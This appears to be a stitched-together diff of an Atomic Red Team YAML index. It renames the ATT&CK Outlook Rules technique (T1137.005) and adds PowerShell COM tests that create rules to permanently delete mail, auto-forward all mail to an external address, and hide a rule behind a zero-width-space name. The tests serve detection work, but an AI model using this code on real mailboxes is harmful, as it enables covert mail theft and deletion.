        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)

@@ -27638,6 +27638,7 @@ persistence:
      - Windows
      - Office Suite
      x_mitre_version: '1.2'
+      identifier: T1137.005
    atomic_tests: []
  T1098.007:
    technique:
@@ -27558,7 +27558,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
      description: |-
        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)

@@ -27579,6 +27579,7 @@ persistence:
      - Windows
      - Office Suite
      x_mitre_version: '1.2'
+      identifier: T1137.005
    atomic_tests: []
  T1098.007:
    technique:
@@ -61893,7 +61893,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
      description: |-
        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)

@@ -61914,7 +61914,410 @@ persistence:
      - Windows
      - Office Suite
      x_mitre_version: '1.2'
-    atomic_tests: []
+      identifier: T1137.005
+    atomic_tests:
+    - name: Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object
+      auto_generated_guid: ffadc988-b682-4a68-bd7e-4803666be637
+      description: |
+        Creates a malicious Outlook rule via the COM object that permanently deletes
+        emails when an email with a specific subject keyword arrives. Simulates
+        adversary persistence via Outlook Rules (T1137.005). Uses DeletePermanently
+        action as it does not require a resolved Exchange folder unlike MoveToFolder.
+        NOTE: olRuleActionStartApplication cannot be created programmatically per
+        Microsoft's Rules object model - DeletePermanently is used as the supported
+        equivalent that generates the same rule-creation artefact.
+        NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+        session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+      supported_platforms:
+      - windows
+      input_arguments:
+        rule_name:
+          description: Name for the malicious Outlook rule
+          type: string
+          default: AtomicTest_T1137005_SubjectTrigger
+        trigger_subject:
+          description: Email subject keyword that triggers the rule
+          type: string
+          default: atomic-rt-trigger
+      dependencies:
+      - description: Classic Outlook must be installed (required for COM automation)
+        prereq_command: |
+          $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+          if ($clsid) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+          Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+          Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+          exit 1
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+              Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+              exit 1
+          }
+
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $rule      = $rules.Create("#{rule_name}", 0)
+
+          $cond = $rule.Conditions.Subject
+          $cond.Enabled = $true
+          $cond.Text    = @("#{trigger_subject}")
+
+          $action         = $rule.Actions.DeletePermanently
+          $action.Enabled = $true
+
+          $rule.Enabled = $true
+          $rules.Save()
+          Write-Host "[+] Rule '#{rule_name}' created. Emails with subject '#{trigger_subject}' will be permanently deleted."
+        cleanup_command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+              exit 1
+          }
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $removed   = $false
+          for ($i = $rules.Count; $i -ge 1; $i--) {
+              if ($rules.Item($i).Name -eq "#{rule_name}") {
+                  $rules.Remove($rules.Item($i).Name)
+                  $removed = $true
+              }
+          }
+          if ($removed) {
+              $rules.Save()
+              Write-Host "[+] All instances of rule '#{rule_name}' removed."
+          } else {
+              Write-Host "[*] Rule '#{rule_name}' not found - already removed."
+          }
+    - name: Outlook Rule - Sender Address Trigger with DeletePermanently Action via
+        COM Object
+      auto_generated_guid: bddfd8d4-7687-4971-b611-50a537ab3ab4
+      description: |
+        Creates an Outlook rule via COM that permanently deletes emails received
+        from a specific sender address. Adversaries use sender-based triggers to
+        make rules appear more legitimate (e.g. disguised as a filter for a
+        specific colleague). Tests a different rule condition path through the
+        COM object model. Uses DeletePermanently as it does not require a resolved
+        Exchange folder unlike MoveToFolder.
+        NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+        session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+      supported_platforms:
+      - windows
+      input_arguments:
+        rule_name:
+          description: Name for the malicious Outlook rule
+          type: string
+          default: AtomicTest_T1137005_SenderTrigger
+        trigger_sender:
+          description: Sender email address that triggers the rule
+          type: string
+          default: atomictest@redteam.local
+      dependencies:
+      - description: Classic Outlook must be installed (required for COM automation)
+        prereq_command: |
+          $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+          if ($clsid) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+          Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+          Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+          exit 1
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+              Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+              exit 1
+          }
+
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $rule      = $rules.Create("#{rule_name}", 0)
+
+          $cond = $rule.Conditions.From
+          $cond.Enabled = $true
+          $cond.Recipients.Add("#{trigger_sender}")
+          $cond.Recipients.ResolveAll() | Out-Null
+
+          $action         = $rule.Actions.DeletePermanently
+          $action.Enabled = $true
+
+          $rule.Enabled = $true
+          $rules.Save()
+          Write-Host "[+] Sender-based rule '#{rule_name}' created. Emails from '#{trigger_sender}' will be permanently deleted."
+        cleanup_command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+              exit 1
+          }
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $removed   = $false
+          for ($i = $rules.Count; $i -ge 1; $i--) {
+              if ($rules.Item($i).Name -eq "#{rule_name}") {
+                  $rules.Remove($rules.Item($i).Name)
+                  $removed = $true
+              }
+          }
+          if ($removed) {
+              $rules.Save()
+              Write-Host "[+] All instances of rule '#{rule_name}' removed."
+          } else {
+              Write-Host "[*] Rule '#{rule_name}' not found - already removed."
+          }
+    - name: Outlook Rule - Auto-Forward Emails to External Address via COM Object
+      auto_generated_guid: b0bd3d76-a57c-4699-83f4-8cd798dd09bd
+      description: |
+        Creates an Outlook rule that automatically forwards all received emails to
+        an external address. Simulates Business Email Compromise (BEC) and insider
+        threat scenarios where adversaries establish forwarding rules to exfiltrate
+        mail. One of the most commonly observed real-world abuses of Outlook rules.
+        Detected by Exchange mail flow anomalies and Microsoft Secure Score
+        forwarding alerts.
+        NOTE: No actual email is forwarded during this test - the rule is created
+        but a trigger email is not sent. Run cleanup immediately after verification.
+        NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+        session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+      supported_platforms:
+      - windows
+      input_arguments:
+        rule_name:
+          description: Name for the forwarding rule
+          type: string
+          default: AtomicTest_T1137005_ForwardExfil
+        forward_to_address:
+          description: Email address to forward mail to (use a controlled test address)
+          type: string
+          default: atomictest-exfil@redteam.local
+      dependencies:
+      - description: Classic Outlook must be installed (required for COM automation)
+        prereq_command: |
+          $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+          if ($clsid) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+          Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+          Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+          exit 1
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+              Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+              exit 1
+          }
+
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $rule      = $rules.Create("#{rule_name}", 0)
+
+          $action = $rule.Actions.Forward
+          $action.Enabled = $true
+          $action.Recipients.Add("#{forward_to_address}")
+          $action.Recipients.ResolveAll() | Out-Null
+
+          $rule.Enabled = $true
+          $rules.Save()
+          Write-Host "[+] Auto-forward rule '#{rule_name}' created -> #{forward_to_address}"
+          Write-Host "[!] Run cleanup immediately after verifying rule creation in Outlook."
+        cleanup_command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+              exit 1
+          }
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $removed   = $false
+          for ($i = $rules.Count; $i -ge 1; $i--) {
+              if ($rules.Item($i).Name -eq "#{rule_name}") {
+                  $rules.Remove($rules.Item($i).Name)
+                  $removed = $true
+              }
+          }
+          if ($removed) {
+              $rules.Save()
+              Write-Host "[+] All instances of forwarding rule '#{rule_name}' removed."
+          } else {
+              Write-Host "[*] Rule '#{rule_name}' not found - already removed."
+          }
+    - name: Outlook Rules - Enumerate Existing Rules via PowerShell COM Object
+      auto_generated_guid: 5ff5249a-5807-480e-ab52-c430497a8a25
+      description: |
+        Enumerates all Outlook rules configured on the local profile using the
+        PowerShell COM object. Simulates the discovery phase where an adversary
+        audits existing rules before implanting their own, or where a threat actor
+        tool such as Ruler lists rules to understand the environment. This
+        enumeration should itself generate telemetry - use it to validate that
+        your monitoring catches PowerShell spawning Outlook COM for recon purposes.
+        NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+        session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+      supported_platforms:
+      - windows
+      dependencies:
+      - description: Classic Outlook must be installed (required for COM automation)
+        prereq_command: |
+          $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+          if ($clsid) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+          Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+          Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+          exit 1
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+              Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+              exit 1
+          }
+
+          $outlook = New-Object -ComObject Outlook.Application
+          $rules   = $outlook.GetNamespace("MAPI").DefaultStore.GetRules()
+
+          Write-Host "`n[*] Enumerating Outlook rules on local profile..."
+          Write-Host "    Total rules found: $($rules.Count)`n"
+
+          for ($i = 1; $i -le $rules.Count; $i++) {
+              $r = $rules.Item($i)
+              Write-Host "  Rule $i : Name='$($r.Name)' | Enabled=$($r.Enabled)"
+          }
+
+          if ($rules.Count -eq 0) {
+              Write-Host "  (No rules configured)"
+          }
+        cleanup_command: 'Write-Host "[*] No cleanup required for enumeration test."
+
+          '
+    - name: Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion)
+      auto_generated_guid: cb814cf8-24f2-41dc-a1cd-1c2073276d4a
+      description: |
+        Creates an Outlook rule with a zero-width space as its display name,
+        making it appear blank and invisible in the standard Outlook Rules UI.
+        Simulates the hidden inbox rule technique documented by Damian Pfammatter
+        (2018) and referenced in MITRE ATT&CK T1137.005 - adversaries use MAPI
+        editors or Ruler to blank PR_RULE_MSG_NAME so the rule does not appear
+        during casual rule auditing. Tests whether monitoring catches rules that
+        are invisible in the Outlook GUI but detectable via MFCMapi or
+        Get-InboxRule on Exchange. Uses PlaySound action as RunApplication
+        cannot be created programmatically per Microsoft's Rules object model.
+        NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+        session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+        NOTE: Script is written to a temp file before execution to prevent the
+        ART executor's quote-wrapping from mangling the zero-width space bytes.
+      supported_platforms:
+      - windows
+      input_arguments:
+        trigger_subject:
+          description: Subject keyword to trigger the hidden rule
+          type: string
+          default: atomic-rt-hidden
+        sound_file_path:
+          description: Path to .wav file used as the rule action payload indicator
+          type: string
+          default: C:\Windows\Media\notify.wav
+      dependencies:
+      - description: Classic Outlook must be installed (required for COM automation)
+        prereq_command: |
+          $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+          if ($clsid) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+          Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+          Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+          exit 1
+      - description: Sound file must exist for PlaySound action
+        prereq_command: 'if (Test-Path "#{sound_file_path}") { exit 0 } else { exit
+          1 }
+
+          '
+        get_prereq_command: |
+          Write-Host "[-] Sound file not found at #{sound_file_path}"
+          Write-Host "    Specify a valid .wav file path in the sound_file_path input argument."
+          exit 1
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+              Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+              exit 1
+          }
+          $tmpScript = "$env:TEMP\T1137005_hidden_rule_create.ps1"
+          $lines = @(
+              '$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
+              '$outlook   = New-Object -ComObject Outlook.Application',
+              '$namespace = $outlook.GetNamespace("MAPI")',
+              '$rules     = $namespace.DefaultStore.GetRules()',
+              '$rule      = $rules.Create($hiddenName, 0)',
+              '$cond = $rule.Conditions.Subject',
+              '$cond.Enabled = $true',
+              '$cond.Text    = @("#{trigger_subject}")',
+              '$action          = $rule.Actions.PlaySound',
+              '$action.Enabled  = $true',
+              '$action.FilePath = "#{sound_file_path}"',
+              '$rule.Enabled = $true',
+              '$rules.Save()',
+              'Write-Host "[+] Hidden rule created with zero-width space name."',
+              'Write-Host "[*] Open Outlook via File -> Manage Rules and Alerts - rule name will appear blank."',
+              'Write-Host "[*] Verify rule exists via PowerShell COM enumeration (Test 4) or Get-InboxRule in Exchange."'
+          )
+          $lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
+          powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
+          Remove-Item $tmpScript -ErrorAction SilentlyContinue
+        cleanup_command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+              exit 1
+          }
+          $tmpScript = "$env:TEMP\T1137005_hidden_rule_cleanup.ps1"
+          $lines = @(
+              '$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
+              '$outlook    = New-Object -ComObject Outlook.Application',
+              '$namespace  = $outlook.GetNamespace("MAPI")',
+              '$rules      = $namespace.DefaultStore.GetRules()',
+              '$removed    = $false',
+              'for ($i = $rules.Count; $i -ge 1; $i--) {',
+              '    if ($rules.Item($i).Name -eq $hiddenName) {',
+              '        $rules.Remove($rules.Item($i).Name)',
+              '        $removed = $true',
+              '    }',
+              '}',
+              'if ($removed) {',
+              '    $rules.Save()',
+              '    Write-Host "[+] Hidden rule(s) removed."',
+              '} else {',
+              '    Write-Host "[-] Hidden rule not found - may have already been removed."',
+              '}'
+          )
+          $lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
+          powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
+          Remove-Item $tmpScript -ErrorAction SilentlyContinue
  T1098.007:
    technique:
      type: attack-pattern
@@ -34241,7 +34241,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
      description: |-
        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)

@@ -34262,6 +34262,7 @@ persistence:
      - Windows
      - Office Suite
      x_mitre_version: '1.2'
+      identifier: T1137.005
    atomic_tests: []
  T1098.007:
    technique:
@@ -30892,7 +30892,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
      description: |-
        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)

@@ -30913,6 +30913,7 @@ persistence:
      - Windows
      - Office Suite
      x_mitre_version: '1.2'
+      identifier: T1137.005
    atomic_tests: []
  T1098.007:
    technique:
@@ -27386,7 +27386,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
      description: |-
        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)

@@ -27407,6 +27407,7 @@ persistence:
      - Windows
      - Office Suite
      x_mitre_version: '1.2'
+      identifier: T1137.005
    atomic_tests: []
  T1098.007:
    technique:
@@ -27154,7 +27154,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
      description: |-
        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)

@@ -27175,6 +27175,7 @@ persistence:
      - Windows
      - Office Suite
      x_mitre_version: '1.2'
+      identifier: T1137.005
    atomic_tests: []
  T1098.007:
    technique:
@@ -50183,7 +50183,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
      description: |-
        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)

@@ -50204,7 +50204,410 @@ persistence:
      - Windows
      - Office Suite
      x_mitre_version: '1.2'
-    atomic_tests: []
+      identifier: T1137.005
+    atomic_tests:
+    - name: Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object
+      auto_generated_guid: ffadc988-b682-4a68-bd7e-4803666be637
+      description: |
+        Creates a malicious Outlook rule via the COM object that permanently deletes
+        emails when an email with a specific subject keyword arrives. Simulates
+        adversary persistence via Outlook Rules (T1137.005). Uses DeletePermanently
+        action as it does not require a resolved Exchange folder unlike MoveToFolder.
+        NOTE: olRuleActionStartApplication cannot be created programmatically per
+        Microsoft's Rules object model - DeletePermanently is used as the supported
+        equivalent that generates the same rule-creation artefact.
+        NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+        session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+      supported_platforms:
+      - windows
+      input_arguments:
+        rule_name:
+          description: Name for the malicious Outlook rule
+          type: string
+          default: AtomicTest_T1137005_SubjectTrigger
+        trigger_subject:
+          description: Email subject keyword that triggers the rule
+          type: string
+          default: atomic-rt-trigger
+      dependencies:
+      - description: Classic Outlook must be installed (required for COM automation)
+        prereq_command: |
+          $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+          if ($clsid) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+          Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+          Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+          exit 1
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+              Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+              exit 1
+          }
+
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $rule      = $rules.Create("#{rule_name}", 0)
+
+          $cond = $rule.Conditions.Subject
+          $cond.Enabled = $true
+          $cond.Text    = @("#{trigger_subject}")
+
+          $action         = $rule.Actions.DeletePermanently
+          $action.Enabled = $true
+
+          $rule.Enabled = $true
+          $rules.Save()
+          Write-Host "[+] Rule '#{rule_name}' created. Emails with subject '#{trigger_subject}' will be permanently deleted."
+        cleanup_command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+              exit 1
+          }
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $removed   = $false
+          for ($i = $rules.Count; $i -ge 1; $i--) {
+              if ($rules.Item($i).Name -eq "#{rule_name}") {
+                  $rules.Remove($rules.Item($i).Name)
+                  $removed = $true
+              }
+          }
+          if ($removed) {
+              $rules.Save()
+              Write-Host "[+] All instances of rule '#{rule_name}' removed."
+          } else {
+              Write-Host "[*] Rule '#{rule_name}' not found - already removed."
+          }
+    - name: Outlook Rule - Sender Address Trigger with DeletePermanently Action via
+        COM Object
+      auto_generated_guid: bddfd8d4-7687-4971-b611-50a537ab3ab4
+      description: |
+        Creates an Outlook rule via COM that permanently deletes emails received
+        from a specific sender address. Adversaries use sender-based triggers to
+        make rules appear more legitimate (e.g. disguised as a filter for a
+        specific colleague). Tests a different rule condition path through the
+        COM object model. Uses DeletePermanently as it does not require a resolved
+        Exchange folder unlike MoveToFolder.
+        NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+        session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+      supported_platforms:
+      - windows
+      input_arguments:
+        rule_name:
+          description: Name for the malicious Outlook rule
+          type: string
+          default: AtomicTest_T1137005_SenderTrigger
+        trigger_sender:
+          description: Sender email address that triggers the rule
+          type: string
+          default: atomictest@redteam.local
+      dependencies:
+      - description: Classic Outlook must be installed (required for COM automation)
+        prereq_command: |
+          $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+          if ($clsid) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+          Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+          Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+          exit 1
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+              Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+              exit 1
+          }
+
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $rule      = $rules.Create("#{rule_name}", 0)
+
+          $cond = $rule.Conditions.From
+          $cond.Enabled = $true
+          $cond.Recipients.Add("#{trigger_sender}")
+          $cond.Recipients.ResolveAll() | Out-Null
+
+          $action         = $rule.Actions.DeletePermanently
+          $action.Enabled = $true
+
+          $rule.Enabled = $true
+          $rules.Save()
+          Write-Host "[+] Sender-based rule '#{rule_name}' created. Emails from '#{trigger_sender}' will be permanently deleted."
+        cleanup_command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+              exit 1
+          }
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $removed   = $false
+          for ($i = $rules.Count; $i -ge 1; $i--) {
+              if ($rules.Item($i).Name -eq "#{rule_name}") {
+                  $rules.Remove($rules.Item($i).Name)
+                  $removed = $true
+              }
+          }
+          if ($removed) {
+              $rules.Save()
+              Write-Host "[+] All instances of rule '#{rule_name}' removed."
+          } else {
+              Write-Host "[*] Rule '#{rule_name}' not found - already removed."
+          }
+    - name: Outlook Rule - Auto-Forward Emails to External Address via COM Object
+      auto_generated_guid: b0bd3d76-a57c-4699-83f4-8cd798dd09bd
+      description: |
+        Creates an Outlook rule that automatically forwards all received emails to
+        an external address. Simulates Business Email Compromise (BEC) and insider
+        threat scenarios where adversaries establish forwarding rules to exfiltrate
+        mail. One of the most commonly observed real-world abuses of Outlook rules.
+        Detected by Exchange mail flow anomalies and Microsoft Secure Score
+        forwarding alerts.
+        NOTE: No actual email is forwarded during this test - the rule is created
+        but a trigger email is not sent. Run cleanup immediately after verification.
+        NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
